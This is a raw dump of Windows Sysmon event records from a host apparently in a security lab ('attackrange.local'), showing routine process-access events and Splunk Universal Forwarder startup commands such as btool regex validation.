13:36:37.749{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003891Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.749{59A5CD1D-8EE5-6005-C900-00000000A301}45642484C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8EE5-6005-CA00-00000000A301}2492C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003890Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.750{59A5CD1D-8EE5-6005-CA00-00000000A301}2492C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk 
ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8EE5-6005-C900-00000000A301}4564C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warnings 10341000x80000000000000003889Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.733{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE5-6005-C900-00000000A301}4564C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003888Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:37.733{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003887Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.733{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003886Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:37.733{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003885Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.733{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003884Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:37.733{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003883Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.733{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003882Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:37.733{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003881Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.733{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003880Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:37.733{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003879Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.733{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE5-6005-C900-00000000A301}4564C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003878Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.733{59A5CD1D-8EE4-6005-C200-00000000A301}24882604C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8EE5-6005-C900-00000000A301}4564C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+181c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003877Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.743{59A5CD1D-8EE5-6005-C900-00000000A301}4564C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8EE4-6005-C200-00000000A301}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000003876Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.702{59A5CD1D-8EE5-6005-C800-00000000A301}48964824C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000003875Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.452{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE5-6005-C800-00000000A301}4896C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003874Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.452{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003873Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:37.452{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003872Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.452{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003871Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:37.452{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003870Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.452{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003869Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:37.452{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003868Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.452{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003867Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:37.452{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003866Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:37.452{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE5-6005-C800-00000000A301}4896C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003865Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
